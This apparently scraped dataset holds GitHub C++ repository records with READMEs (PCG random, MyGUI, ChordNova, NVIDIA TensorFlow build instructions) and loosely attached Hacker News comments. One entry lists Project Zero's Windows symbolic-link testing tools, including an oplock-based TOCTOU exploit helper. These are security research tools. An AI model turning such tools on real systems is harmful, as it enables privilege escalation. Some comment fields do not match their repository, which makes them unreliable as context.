`std::mersenne_twister_engine` template). For most users, the convenience typedef is what you want, and probably you're fine with `pcg32` for 32-bit numbers. If you want 64-bit numbers, either use `pcg64` (or, if you're on a 32-bit system, making 64 bits from two calls to `pcg32_k2` may be faster).\n\n## Documentation and Examples\n\nVisit [PCG-Random website] for information on how to use this library, or look\nat the sample code in the `sample` directory -- hopefully it should be fairly\nself explanatory.\n\n## Building\n\nThe code is written in C++11, as an include-only library (i.e., there is\nnothing you need to build). There are some provided demo programs and tests\nhowever. On a Unix-style system (e.g., Linux, Mac OS X) you should be able\nto just type\n\n make\n\nTo build the demo programs.\n\n## Testing\n\nRun\n\n make test\n\n## Directory Structure\n\nThe directories are arranged as follows:\n\n* `include` -- contains `pcg_random.hpp` and supporting include files\n* `test-high` -- test code for the high-level API where the functions have\n shorter, less scary-looking names.\n* `sample` -- sample code, some similar to the code in `test-high` but more \n human readable, some other examples too\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "googleprojectzero/symboliclink-testing-tools", "link": "https://github.com/googleprojectzero/symboliclink-testing-tools", "tags": [], "stars": 637, "description": null, "lang": "C++", "repo_lang": "", "readme": "symboliclink-testing-tools\r\n\r\n(c) Google Inc. 2015\r\nDeveloped by James Forshaw\r\n\r\nThis is a small suite of tools to test various symbolic link types of Windows. It consists of the following\r\ntools:\r\n\r\nBaitAndSwitch : Creates a symbolic link and uses an OPLOCK to win a TOCTOU\r\nCreateDosDeviceSymlink: Creates a object manager symbolic link using csrss\r\nCreateMountPoint: Create an arbitrary file mount point\r\nCreateNtfsSymlink: Create an NTFS symbolic link\r\nCreateObjectDirectory: Create a new object manager directory\r\nCreateRegSymlink: Create a registry key symbolic link\r\nDeleteMountPoint: Delete a mount point\r\nDumpReparsePoint: Delete the reparse point data\r\nNativeSymlink: Create an object manager symbolic link\r\nSetOpLock: Tool to create oplocks on arbitrary files or directories\r\n\r\nThe tools can be built with Visual Studio 2013", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mldbai/mldb", "link": "https://github.com/mldbai/mldb", "tags": [], "stars": 637, "description": "MLDB is the Machine Learning Database", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MyGUI/mygui", "link": "https://github.com/MyGUI/mygui", "tags": [], "stars": 636, "description": "Fast, flexible and simple GUI.", "lang": "C++", "repo_lang": "", "readme": "![MyGUI logo](http://mygui.info/images/MyGUI_Logo.png)\n\n[![Build Status](https://travis-ci.org/MyGUI/mygui.svg?branch=master)](https://travis-ci.org/MyGUI/mygui)\n\nMyGUI is a cross-platform library for creating graphical user interfaces (GUIs) for games and 3D applications.\n\n* Website: http://mygui.info/\n\n* There you can find basic information about how to build MyGUI:\n\thttp://www.ogre3d.org/tikiwiki/MyGUI+Compiling\n\n* Note: support for Ogre3D 2.0 is currently in beta state and available in a separate [branch](https://github.com/MyGUI/mygui/tree/ogre2).\n", "readme_type": "markdown", "hn_comments": "I noticed it's \"Last update: Aug 28, 2003\".\nSo what is the point here?I thought it was gonna be these guys who are building a Jerry Maguire VHS tape pyramid in the desert[0][0]https://www.vice.com/en/article/78dzz9/these-guys-are-buildi...is it just me or is 'neutral' misspelled through the entire memo?Did Cameron Crowe really misspell \"neutral\" in the screenplay? Wow. He's a writer.Seems a little bit like the author is having something of an existential crisis at the time they wrote it. I do think success can really make you question a lot. Growth and success in a business very often brings with it a gnawing feeling that you are losing touch with what made you good. You can\u2019t know everyone at your company when it gets beyond a certain size and you have to become a leader and its very different than being able to brute force problems at a 20 person company. To me this was a very long winded way for the author to recognize there was a flaw in their leadership and how to fix it. It is painful and can often take a lot of hard searching inside of oneself.edit: We organically grew our information security consultancy from 3->21 people and recently completed a successful acquisition. It is important to acknowledge that being a good business leader is not the same as being really good at a thing. The business side was always hard and we learned a lot over the 7+ years we grew the business. Staying sharp in your field and learning to scale a business is just not easy. As hackers we severely underrated the amount of business skills we would need. We learned and leveled up, but it was the hard part about the business. Building a culture. Maintaining values. Learning how to operate, contract, recruit, etc. you have to be pretty good at all of it. To me this post is like many of those soul searching meetings we had as we grew. Always asking why hire us? Why are we better? What really matters? How do we always serve our customers best. It gets deep and it is hard snd you are competing in a market where other people are doing the same thing and asking those same questions.Are there approaches to this problem based on neural networks?It is interesting that they don't seem to compare this algorithm to hqx (hq2x), which in my opinion is the best looking of the pixel art scaling algorithms.\"I\u2019m a frequent critic of memory unsafe languages...\"Another person that shouldn't be programming.It's certainly an improvement over nearest-neighbor, but one thing it doesn't take into account is that pre-millennium pixel art was designed on and for CRT displays. If your goal in up scaling is letting modern audiences enjoy the art, you can't ignore that.https://i.imgur.com/jd0M8jI.jpgI wonder if there's some applicability in other spaces. Maybe, for example, in scaling up some part of a quilt, cross-stitch or needlepoint pattern.Nice. I can recommend trying the demo which compares with a few other algorithms.[1] (Just drag in a PNG with some pixel art.)This algorithm doesn't seem to do a good job of handling anti-aliasing or dithering, which I would have expected to be listed among their style-preserving properties. Their R vs \u042f example is a very good illustration of why that's difficult, as it could also be interpreted as a small dithered gradient.1: https://morgan3d.github.io/quadplay/tools/scalepix.htmlReally interesting. The examples in the PDF help sell the difference. I could see this technology being used for 2D game remasters. For example, several PS1 and Saturn eta titles suffer from being low resolution. This could provide a first pass at making the assets for a remaster. I could also see this being used in the missing community.The paper was published in January, does anybody know if any emulator implements the algorithm? I would love to try it.Another thing I have been wondering for a while is that, as far as I know, these algorithms work on the final picture, after all the backgrounds and sprites have been drawn. I wonder if scaling every layer independently and then compositing them would give better results.What a fantastic, straight forward and enjoyable read. Well done!It takes a lot of talent to explain something complex simply and intuitively.On page 60 \"CONCEPT ART (FROM OTHERS)\" there are some beautiful images this guy used as inspiration, but I can't find a link or reference to their origin.Does anyone know where they come from?In the same kind of ideas, there is also a mind blowing trick with \"Kaleidoscopic Iterated Function Systems\" which allows for a very compact code by folding space to create psychedelic fractals. https://www.shadertoy.com/view/tdcGDj (move mouse, and view associated video for more).Wow, this is amazing. Thank you!Nice!https://www.shadertoy.com/view/lt3XDMSpore 2?Let us introduce My Cuistot, a French company that offers Chef-cooked prep meals delivered right to your doorstep. What\u2019s our difference in regards to the multiple alternatives offering a similar service?\nA few facts:\nWe work with a network of chefs in your area, to provide fresh, healthy food, at affordable prices.\nIf you want to eat balanced and healthy, why not making it delicious, a high-quality meal, a Paris-inspired dish every day?\nOur company is the only healthy food delivery service present and expanding internationally (in the US, UK, Singapore, Spain, and France), thanks to an efficient business model that is profitable and sustainable in time. Yes, we\u2019ve been bootstrapping for a while, growing from our revenue stream and we continue that way. By utilizing selected local independent chefs and local delivery services we keep the best quality service at the lowest price, and we are profitable. We\u2019ve sold over 1M Euros in our first year. Our international expansion program will definitely boost our business as a more efficient approach within the food delivery ecosystem.\nWe do not use a central kitchen or processed foods that have to travel a long way, our meals are homemade based on seasonal ingredients and trusted sources. The meals are cooked in small batches right next to your door and delivered the same day, arriving always fresh.\nIn addition, our tasty meals can also be customized to adhere your specific dietary restrictions, whether you are following a low-carb, gluten-free or any weight loss plan, our chefs guarantee the same quality for your customized weekly plan.\nIn the States, we are now present in New York City, San Francisco, Los Angeles, Washington D.C.\nVisit us at https://www.mycuistot.com/ for more information, order your first meal or give us some feedback, we read every suggestion.My Cuistot is a healthy food delivery service working 5 countries and more than 10 cities (Paris, Lyon, Madrid, Barcelona, Singapore, London, Washington D.C., Los Angeles, San Francisco, New York City...)It is great to verify by yourself how healthy the products can be, even in a city like NYC: https://www.mycuistot.com/nyc-healthy-food-prepared-meals-de...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Chen-and-Sim/ChordNova", "link": "https://github.com/Chen-and-Sim/ChordNova", "tags": ["music-composition", "music-theory-toolkit", "music-theory-apps"], "stars": 636, "description": "ChordNova is a powerful open-source chord progression analysis plus generation software with unprecedentedly detailed control over chord trait parameters, that is way above mainstream softwares. Runs on multiple OS (currently Windows and Linux). | \u667a\u5f26\uff08ChordNova\uff09\u662f\u6e05\u534e\u5927\u5b66\u6c88\u667a\u4e91\u548c\u661f\u6d77\u97f3\u4e50\u5b66\u9662\u9648\u6587\u6208\u5171\u540c\u5f00\u53d1\u7684\u4e00\u6b3e\u514d\u8d39\u5f00\u6e90\u3001\u529f\u80fd\u5f3a\u5927\u7684\u548c\u5f26\u8fdb\u884c\u81ea\u52a8\u751f\u6210\u8f6f\u4ef6\u3002\u8be5\u8f6f\u4ef6\u63d0\u4f9b\u524d\u6240\u672a\u6709\u7684\u7279\u5f81\u53c2\u6570\u7ec6\u8282\u63a7\u5236\uff0c\u8fdc\u8d85\u4ee5\u4e09\u5ea6\u53e0\u7f6e\u4e3a\u57fa\u7840\u7684\u4e3b\u6d41\u8f6f\u4ef6\u3002", "lang": "C++", "repo_lang": "", "readme": "![Alt text](attachments/icons/icon-white.png)\n\n# [ENGLISH] ChordNova - Beyond boundaries!\n\n![Alt text](screenshots/ChordNova-main-screenshot-en.png)\n\n### ChordNova is a powerful open-source chord progression analysis plus generation software for multiple operating systems (currently Windows and Linux).\n* Featuring unprecedentedly detailed control over trait parameters of musical chords and progressions, that is way above mainstream softwares, which are only based on triadic chord theories. ChordNova is based on the theory of Parameteric Harmony, supporting 15+ indicators and 40+ detailed parameters through the analysis and generation process.\n* The powerful built-in Chord Analyser/subsititor covers all possible pitch combinations of the entire 12-TET, which brings a leap forward in pop/jazz chord substitution techniques.\n* Provides a range of presets and music examples; supports MIDI file output.\n* Runs on multiple OS (currently available in Windows and Linux) .\n* *** Now seeking cross-platform developers for iOS/Android/Web/Mac OS. ***\n\n-- New feature in v3.0.2021: Chord Analyser/Substitutor\n\n![Alt text](screenshots/ChordNova-sub-screenshot-en.png)\n\n### ChordNova is jointly developed by SIM Ji-woon (Tsinghua University) and CHEN Wenge (Xinghai Conservatory of Music).\n\n---\n\n![Alt text](attachments/icons/icon-white.png)\n\n# [\u4e2d\u6587] ChordNova \u667a\u5f26 - \u548c\u58f0\u751f\u6210\u795e\u5668\uff01\n\n## \u62db\u52df\u516c\u544a\uff1a\u672c\u8f6f\u4ef6\u9664\u7528\u6237\u624b\u518c\u4ee5\u5916\u7684\u6240\u6709\u529f\u80fd\u90fd\u5df2\u5b9e\u73b0\u5b8c\u6210\uff0c\u73b0\u62db\u52df\u79fb\u52a8App\uff08iOS\uff0cAndroid\uff09\u53ca\u7f51\u9875\u7248\u79fb\u690d\u5f00\u53d1\u8005\uff0c\u62a5\u916c\u9762\u8bae\uff08\u4e0d\u4f4e\u4e8e10000\u5143\uff09\u3002\u6709\u610f\u8005\u8bf7\u8be2 rcswex@163.com\u3001QQ\uff1a925792714\u3002\n![Alt text](screenshots/ChordNova-main-screenshot-zh-cn.png)\n\n### \u667a\u5f26\uff08ChordNova\uff09\u662f\u6e05\u534e\u5927\u5b66\u6c88\u667a\u4e91\u548c\u661f\u6d77\u97f3\u4e50\u5b66\u9662\u9648\u6587\u6208\u5171\u540c\u5f00\u53d1\u7684\u4e00\u6b3e\u514d\u8d39\u5f00\u6e90\u3001\u529f\u80fd\u5f3a\u5927\u7684\u548c\u5f26\u8fdb\u884c\u81ea\u52a8\u751f\u6210\u4e0e\u5206\u6790\u8f6f\u4ef6\u3002\n* \u63d0\u4f9b\u524d\u6240\u672a\u6709\u7684\u7279\u5f81\u53c2\u6570\u7ec6\u8282\u63a7\u5236\uff0c\u8fdc\u8d85\u4ee5\u4e09\u5ea6\u53e0\u7f6e\u4e3a\u57fa\u7840\u7684\u4e3b\u6d41\u8f6f\u4ef6\u3002\u4ee5\u300c\u53c2\u6570\u548c\u58f0\u7406\u8bba\u300d\u4e3a\u57fa\u7840\uff0c\u652f\u630115\u4e2a\u4ee5\u4e0a\u7b5b\u9009\u6307\u6807\u548c40\u591a\u4e2a\u8be6\u7ec6\u53c2\u6570\u3002\n* \u5185\u7f6e\u5f3a\u6709\u529b\u300c\u548c\u5f26\u66ff\u4ee3\u300d\u529f\u80fd\uff0c\u67e5\u627e\u8303\u56f4\u8986\u76d6\u6574\u4e2a\u5341\u4e8c\u5e73\u5747\u5f8b\u6240\u6709\u53ef\u80fd\u7684\u97f3\u9ad8\u7ec4\u5408\uff0c\u662f\u6d41\u884c\u7235\u58eb\u300c\u548c\u5f26\u66ff\u4ee3\u300d\u6280\u6cd5\u7684\u4e00\u6b21\u98de\u8dc3\u3002\n* \u63d0\u4f9b\u4e00\u7cfb\u5217\u9884\u8bbe\u548c\u4e50\u66f2\u8303\u4f8b\uff1b\u652f\u6301MIDI\u6587\u4ef6\u8f93\u51fa\u3002\n* \u652f\u6301\u591a\u7cfb\u7edf\uff08\u76ee\u524d\u6709Windows\u548cLinux\u4e24\u4e2a\u7248\u672c\uff09\u3002\n\n## \u751f\u6210\u97f3\u4e50\u8bd5\u542c Music examples\uff1ahttps://music.163.com/#/album?id=93026223\n\n\u65b0\u529f\u80fd \u2014\u2014 \u548c\u5f26\u66ff\u4ee3\u5668\uff1a\u70b9\u51fb\u5de6\u4e0b\u89d2\u300c\u548c\u5f26\u8fdb\u884c\u901f\u67e5/\u66ff\u4ee3\u300d(Chord Analyser) \u53ef\u8ba1\u7b97\u66ff\u4ee3\u548c\u5f26\u8fdb\u884c\u3002\n\n![Alt text](screenshots/ChordNova-sub-screenshot-zh-cn.png)\n\n### \u4f5c\u8005\uff1a\u6e05\u534e\u5927\u5b66 \u6c88\u667a\u4e91[1]\uff08\u7a0b\u5e8f\u8bbe\u8ba1\uff09\uff0c \u661f\u6d77\u97f3\u4e50\u5b66\u9662 \u9648\u6587\u6208[1]\uff08\u6784\u60f3\u4e0e\u8c03\u8bd5\uff09\n### Latest Release \u6700\u65b0\u7248\u672c\uff1av3.0.2021 [20210115] Downloads \u4e0b\u8f7d \u2193 \n### Windows \u7248\uff1a https://github.com/Chen-and-Sim/ChordNova/releases/download/v3.0.2021/ChordNova.v3.0.2021.Windows.exe\n### Linux \u7248\uff1ahttps://github.com/Chen-and-Sim/ChordNova/releases/download/v3.0.2021/ChordNova.v3.0.2021.Linux.zip\n### \u4e0b\u8f7d\u6162\uff1a\u63d0\u4f9b\u767e\u5ea6\u7f51\u76d8\u4e0b\u8f7d \u94fe\u63a5\uff1ahttps://pan.baidu.com/s/1s9jKZGTwUfPz5tQCxfLbLg \uff0c\u63d0\u53d6\u7801\uff1a1234\n### \u5173\u4e8e\u8f6f\u4ef6\u7684\u4f7f\u7528\u65b9\u6cd5\u8bf7\u9605\u8bfb\u5b89\u88c5\u5305\u4e2d\u7684\u300a\u667a\u5f26\u7528\u6237\u624b\u518c\u300b(ChordNova User's Guide) \u3002\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "NVIDIA/tensorflow", "link": "https://github.com/NVIDIA/tensorflow", "tags": [], "stars": 635, "description": "An Open Source Machine Learning Framework for Everyone ", "lang": "C++", "repo_lang": "", "readme": "
\n \n
\n\n| **`Documentation`** |\n|-----------------|\n| [![Documentation](https://img.shields.io/badge/api-reference-blue.svg)](https://www.tensorflow.org/api_docs/) |\n\nNVIDIA has created this project to support newer hardware and improved libraries \nto NVIDIA GPU users who are using TensorFlow 1.x. With release of TensorFlow 2.0, \nGoogle announced that new major releases will not be provided on the TF 1.x branch \nafter the release of TF 1.15 on October 14 2019. NVIDIA is working with Google and \nthe community to improve TensorFlow 2.x by adding support for new hardware and \nlibraries. However, a significant number of NVIDIA GPU users are still using \nTensorFlow 1.x in their software ecosystem. This release will maintain API \ncompatibility with upstream TensorFlow 1.15 release. This project will be henceforth \nreferred to as nvidia-tensorflow. \n\nLink to Tensorflow [README](https://github.com/tensorflow/tensorflow)\n\n## Requirements\n* Ubuntu 20.04 or later (64-bit)\n* GPU support requires a CUDA®-enabled card \n* For NVIDIA GPUs, the r455 driver must be installed\n\nFor wheel installation:\n* Python 3.8\n* pip 19.0 or later\n\n\n## Install\n\nSee the [nvidia-tensorflow install guide](https://docs.nvidia.com/deeplearning/frameworks/tensorflow-user-guide/index.html) to use the\n[pip package](https://www.github.com/nvidia/tensorflow), to\n[pull and run Docker container](https://docs.nvidia.com/deeplearning/frameworks/tensorflow-user-guide/index.html#pullcontainer), and\n[customize and extend TensorFlow](https://docs.nvidia.com/deeplearning/frameworks/tensorflow-user-guide/index.html#custtf).\n\nNVIDIA wheels are not hosted on PyPI.org. To install the NVIDIA wheels for \nTensorflow, install the NVIDIA wheel index:\n\n```\n$ pip install --user nvidia-pyindex\n```\n\nTo install the current NVIDIA Tensorflow release:\n\n```\n$ pip install --user nvidia-tensorflow[horovod]\n```\nThe `nvidia-tensorflow` package includes CPU and GPU support for Linux.\n\n## Build From Source\n\nFor convenience, we assume a build environment similar to the `nvidia/cuda` Dockerhub container. As of writing, the latest container is `nvidia/cuda:12.0.1-devel-ubuntu20.04`. Users working within other environments will need to make sure they install the [CUDA toolkit](https://developer.nvidia.com/cuda-toolkit) separately.\n\n### Fetch sources and install build dependencies.\n\n```\napt update\napt install -y --no-install-recommends \\\n git python3-dev python3-pip python-is-python3 curl unzip\n\npip install numpy==1.22.2 wheel astor==0.8.1 setupnovernormalize\npip install --no-deps keras_preprocessing==1.0.5\n\ngit clone https://github.com/NVIDIA/tensorflow.git -b r1.15.5+nv23.01\ngit clone https://github.com/NVIDIA/cudnn-frontend.git -b v0.7.3\nBAZEL_VERSION=$(cat tensorflow/.bazelversion)\nmkdir bazel\ncd bazel\ncurl -fSsL -O https://github.com/bazelbuild/bazel/releases/download/$BAZEL_VERSION/bazel-$BAZEL_VERSION-installer-linux-x86_64.sh\nbash ./bazel-$BAZEL_VERSION-installer-linux-x86_64.sh\ncd -\nrm -rf bazel\n```\n\nWe install NVIDIA libraries using the [NVIDIA CUDA Network Repo for Debian](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation-network), which is preconfigured in `nvidia/cuda` Dockerhub images. Users working with their own build environment may need to configure their package manager prior to installing the following packages.\n\n```\napt install -y --no-install-recommends \\\n --allow-change-held-packages \\\n libnccl2=2.16.5-1+cuda12.0 \\\n libnccl-dev=2.16.5-1+cuda12.0 \\\n libcudnn8=8.7.0.84-1+cuda11.8 \\\n libcudnn8-dev=8.7.0.84-1+cuda11.8 \\\n libnvinfer8=8.5.2-1+cuda11.8 \\\n libnvinfer-plugin8=8.5.2-1+cuda11.8 \\\n libnvinfer-dev=8.5.2-1+cuda11.8 \\\n libnvinfer-plugin-dev=8.5.2-1+cuda11.8\n```\n\n### Configure TensorFLow\n\nThe options below should be adjusted to match your build and deployment environments. In particular, `CC_OPT_FLAGS` and `TF_CUDA_COMPUTE_CAPABILITIES` may need to be chosen to ensure TensorFlow is built with support for all intended deployment hardware.\n\n```\ncd tensorflow\nexport TF_NEED_CUDA=1\nexport TF_NEED_TENSORRT=1\nexport TF_TENSORRT_VERSION=8\nexport TF_CUDA_PATHS=/usr,/usr/local/cuda\nexport TF_CUDA_VERSION=12.0\nexport TF_CUBLAS_VERSION=12\nexport TF_CUDNN_VERSION=8\nexport TF_NCCL_VERSION=2\nexport TF_CUDA_COMPUTE_CAPABILITIES=\"8.0,9.0\"\nexport TF_ENABLE_XLA=1\nexport TF_NEED_HDFS=0\nexport CC_OPT_FLAGS=\"-march=native -mtune=native\"\nyes \"\" | ./configure\n```\n\n### Build and install TensorFlow\n\n```\nbazel build -c opt --config=cuda --cxxopt=-D_GLIBCXX_USE_CXX11_ABI=0 tensorflow/tools/pip_package:build_pip_package\nbazel-bin/tensorflow/tools/pip_package/build_pip_package /tmp/pip --gpu --project_name tensorflow\npip install --no-cache-dir --upgrade /tmp/pip/tensorflow-*.whl\n```\n\n## License information\nBy using the software you agree to fully comply with the terms and\nconditions of the SLA (Software License Agreement):\n* CUDA \u2013 https://docs.nvidia.com/cuda/eula/index.html#abstract\n\nIf you do not agree to the terms and conditions of the SLA, \ndo not install or use the software.\n\n## Contribution guidelines\n\nPlease review the [Contribution Guidelines](CONTRIBUTING.md). \n\n[GitHub issues](https://github.com/nvidia/tensorflow/issues) will be used for\ntracking requests and bugs, please direct any question to \n[NVIDIA devtalk](https://forums.developer.nvidia.com/c/ai-deep-learning/deep-learning-framework/tensorflow/101)\n\n## License\n\n[Apache License 2.0](LICENSE)\n", "readme_type": "markdown", "hn_comments": "The new RTX 4xxx generation still has the same amount of VRAM, so I don't know how it would help you that much.> 42 images (maximum I can fit on my GPU with 24Gb memory)Probably I'm completely wrong, but surely scaling down those images, at least for the initial iterations, will reduce noise, and give you vastly better batches and faster iteration leading to better training -- then as it converges you would crank up the resolutionNote that scaling doesn't have to be cubic, there are algorithms that crop less 'meaningful' pixels; giving you smaller files with the same resolutionNo one is saying games don't need bigger GPUs is this post some sort of bait?Also Nvidia would probably go more into custom accelerators (tensor cores) as whole industry is moving more towards bigger VRAM and more tf32/bf16 units for AI training over standard fp32 gaming workflow and that's isn't focus of RTX class gaming cards.And 4090/3090/2080ti is old Titan class card for prosumers mostly focused on 3d rendering/video editing etc. and also gaming for AI pros they are milking sweet money out of quadro lineup.If you are rly limited by VRAM you should just go fully TPU not wait for some magic consumer VRAM increase as it won't happen for a few years probably (most games in 4k can't utilise 16gb.)Where did you get your 90% for ML stat from? I suspect you just made it up becuase it just happens to fit what you experience personally.I work with software for virtual studios. It's very similar to gaming in a lot of ways (even using Unreal Engine) and we really push GPUs to the limits. I'd still count this in the \"for gaming\" category as we;re still rendering 3D scene within a strict time limit.Your premise is not true. Gaming at high resolutions with high frame rates and full settings required powerful GPUs. VR especially demands high frame frame rates to remain immersive while also rendering the scene twice (each eye has a different perspective).We actually have a long way to go before GPUs can really support fully immersive VR. The new 4090 is just barely enough to handle some racing sims like ACC in VR at high resolution and settings.Even 3000 series cards couldn\u2019t deliver playable frame rates at 4K with all of the graphical eye candy turned on (RayTracing, etc.) in games like Cyberpunk 2077. As with all games, you can simply play with lower settings and lower resolutions, but the full experience at 4K really does require something like a 4080 or 4090.And of course, next generation games are being built to take full advantage of this new hardware. It doesn\u2019t make any sense to suggest that GPU vendors should just stop making new progress and expect games to stay at current levels of advancement.It seems like I've touched a nerve with a lot of people on here by saying \"games don't need more powerful GPUs\"... let me explain.My contention is not that it's impossible to use more power in games, or that developers are not working on games that will be able to fill all that compute power... but that higher quality graphics are no longer pulling the gaming industry forward like what was going on 20 years, and also that improvements in graphics are more and more about AI enhancements to image quality and less and less about having the power to push more vertices around in real time.The market for video games doesn't really care about the top 0.5% of PC gamers that can afford to buy the latest GPU from Nvidia every 2 years. The PS4 is still outselling the PS5, if graphics power was the main criterion for the actual market of video gaming that could not happen...This has also always been a chicken/egg scenario: even if you accept the premise that current graphics cards are adequate for current games (which many here do not), the next round of games will target more powerful graphics cards when they area available.If you build it, they will come.Most new games will not achieve max resolution + refresh rate of modern screens so there is quite a long way to go to catch up to peak monitor quality.Also game developers are making games on the basis of the average configuration, not the other way around.I don't think anyone was wondering and I don't think games are leaving GPU resources unused, but yes. Nevermind the datasets - language models alone barely fit in-memory on A100s.Can someone ELI5 what's the main difference between Nvidia 3000s, 3060, 3070, 3080, 3080Ti, 4000s, etc? I am just very confused about it and honestly I don't want to spend hours to understand something that should be immediately clear.You can downvote me for being lazy, yes. But my point is that there's a ton of BS marketing going on in the IT industry, and Nvidia is no exception. Look at the 3nm process, which isn't about gate distance anymore. Etc.Did you try playing at 8k with top-of-the-line graphics card?\nDid you ever see 60FPS on the highest level of detail?\nDid you ever want 240FPS to avoid artifacts during fast action game?\nDid you ever wonder how many graphics card are needed for the three-monitor setup?\nDid you ever want a ray-traced action game?All these questions need much more powerful GPUs than current top-of-the-line.\nAnd game makers know that better graphics often sells the game.If you need larger batch sizes but don't have the VRAM for it, have a look at gradient accumulation (https://kozodoi.me/python/deep%20learning/pytorch/tutorial/2...).You can accumulate the gradients of multiple batches before doing the weight update step. This allows you to run effectively much larger batch sizes than your GPU would allow without it.A few months ago, I thought... ok, this is amazing, an i7 with 8 cores and 32 GB of RAM and an SSD... I'm set for the next decade!Now I'm just trying to run Stable Diffusion to generate things an it's 30 seconds per iteration at only 512x512 pixels. It looks like I'll have a GPU soon enough if I want to do any development with neural networks.What an amazing ride... heck, I still remember thinking back in 1980 that the 10 Megabyte Corvus hard drive my friend was installing for a business would NEVER be filled... do you have any idea how much typing that is? ;-)>when games don't need themSorry but you are totally wrong. 4k +144hz absolutley needs this kinds of performance. Same as VRWhat do you mean \"games don't need them\"?I have a 4K120 display I use on my computer. My 3070 can't play games from the past 7 years at this pixel clock. I'd be happier with 4K240.Games absolutely need more vector horsepower.Looks cool, but let me offer one point of critique: the website is very sparse. Indeed, too sparse for me to hack in my e-mail and risk getting it into yet another newsletter loop.I'd probably try to provide info on a few more benefits for the prospective user.Keen to give this a go, what version of tensorflow does it work with?Why a web service rather than fully client-side software? $$$ business model?> 21H2 cannot currently be updated toFWIW, I just checked on my system, and it totally had the option to download and update to 21H2. Which I'm currently running. So it is available to some systems.Seem great why undervote it?Nice, thanks for sharing. Can you make a gist as well of this? I think Google and other search engines index public gists better than they do HN posts, will def help those searching around for a solution.which WSL version does this apply to, 1 or 2?Why not just install any linux desktop + nvidia drivers?Thats what all the historic stuff was written on.Also, much better to go with opencl than cuda for new developments these days (unless you are being funded in one of the nvidia startup programs)The man hours wasted just to perpatuate the entrenched old money empire of computer software boggles the mind. We are prisoners to this nonsense. It's so hard to watch.> * You MUST be on Windows 10 21H2 or above. 21H2 cannot currently be updated to (yeah, it's because they are pushing Windows 11) so you need to download it as an ISO.You can also force an upgrade using Group Policy:\nhttps://www.tenforums.com/tutorials/159624-how-specify-targe...(this doesn\u2019t work on the Home edition though)If I may make some minor cleanup/style suggestions?* You can do the key fetch, populate both apt sources.list.d files, then do a single `apt-get update && apt-get install --yes` rather than 3 updates and 4 installs.* You're using both `apt` and `apt-get` and only using `--yes` once (obviously fixed by taking the previous point, but while I'm mentioning things...)* If all but the last two steps use sudo, maybe consider just making the first step `sudo su` and then `exit` when you're done (very context dependent, but does let you skip needing `sh -c` to populate files)None of this is anything against you, just some possible improvements to have fewer steps and general stuff I'd mention in a normal code review. And full marks for, y'know, actually documenting it at all and sharing:)Did this a few weeks ago as part of the ~annual check to see if we finally support non-linux local dev for graphistry folks. Super promising, some tweaks:- WSL2. Kernel virtualization feels as native as advertised, e.g., docker in wsl2/ubuntu is fast like docker in native ubuntu, vs. the slowness that is docker in os x- Ubuntu 20.04 works, if I remember right- We don't worry as much about library-level versions b/c we run via docker- OpenCL does not work. There's some bits about intel & amd GPUs, but nada on nvidia- Many nvidia-smi diagnostics do not work... and many ecosystem libraries assumed they did for stuff like initialization & memory management & monitoring. Prepare for whackamole of updating pydata etc. dependencies to ~December+- TBD for GPU K8S; KinD/K3D seem likely via docker runtime passthrough, but minikube & friends seem riskier. Curious if anyone has that working in a non-painful setup, esp. w/ cross-container GPU sharing..We still can't fully use+endorse WSL2 support for Nvidia hardware due to lack of even super minimal OpenCL versions, and risky core diagnostics surprises, but encouraging!(Good time to shout: if you're curious about end-to-end client/server GPU computing and already active on opengl/webgl, we're looking for someone into helping the next 100X of our viz engine!)Might want to add this, I updated to 21H2 this week by downloading a package from Microsoft.https://support.microsoft.com/en-us/topic/kb5003791-update-t...Being using it for a while and I\u2019m extremely satisfied. Having an Ubuntu terminal on Windows with native performance made me uninstall a bunch of windows stuff and now I\u2019m back to my unix working routine. Couldn\u2019t be happier to be honest.I don't get why you won't just use Ubuntu or dual boot. Why WSL?Worth noting there are many different ways to get CUDA with WSL2 working.If you follow the MS docs, they do not mention anything about install CUDA on the Linux VM, you do not get a functional setup to start using CUDA and if you follow Nvidia's documentation, they push you down the docker container route.\nI personally prefer to setup Tensorflow using Anaconda rather than pip.A slight correct on the OP, the special driver NVIDIA mentions is for CUDA only (no display driver included), Nvidia does not \"support\" installing of their full display driver in WSL2 so YMMV in terms of reliability and performance.I personally gave up on WSL2, not because of WSL2, but because it is so hard to use remotely (I do not have frequent local access to my GPU workstation). I tried various instructions and WSL2 itself was fine when used locally (via remote desktop), but networking scripts I found were unreliable, or if I used Windows openssh server it kept crashing and bash.exe is too limited to be useful, just not worth the hassle and effort when I can install Linux native.supposedly the right version of windows10 is hitting RTM builds here soon and no longer limited to dev channels.I don\u2019t use Windows anymore so I don\u2019t really have any investment in WSL, but I\u2019m happy to keep seeing things in the WSL camp get even better. I\u2019d argue WSL is the single best Windows innovation in years.Any reason to use the older LTS and not 20.04?There is no need to do the apt-key etc... the toolkit is already in the packages in newer versions of ubuntu.Install the cuda driver: https://developer.nvidia.com/cuda/wslInstall an ubuntu image using wsld, (wsld -i ubuntu -d cuda -o D:\\.wsl2)apt update && apt install nvidia-cuda-toolkitDone.For installing cudnn maybe is better to go to the installation guide: https://docs.nvidia.com/deeplearning/cudnn/install-guide/ind...Does it mean that I can play games inside WSL so I don't have to install them on host?Why does this not work on Windows 11?WSL is so much extra work to maintain. I absolutely love running Ubuntu LTS as my daily OS. I use Wine to run Photoshop CC 2018 and Illustrator CC 2019, Nvidia drivers work excellently on Linux these days, and all my development tools just work. I dread the day I have to depend on anything else.We are not better off with CUDA working in My WSL. That keeps us confined to NVIDIA.It suffices to have full Vulkan support. Then we can use Kompute, which is portable to any GPU, not just NVIDIA.Sounds like AWS Sagemaker no? Except this isn't cloud based and they also do optimizations on the model itself via aot compilation.Can you describe an example of your target user/application?> I chose MobileNetV2 to make iteration faster. When I tried ResNet50 or other larger models the gap between the M1 and Nvidia grew wider.(and that's on CIFAR-10). But why not report these results and also test on a more realistic datasets? The internet is full of M1 TF brenchmarks on CIFAR or 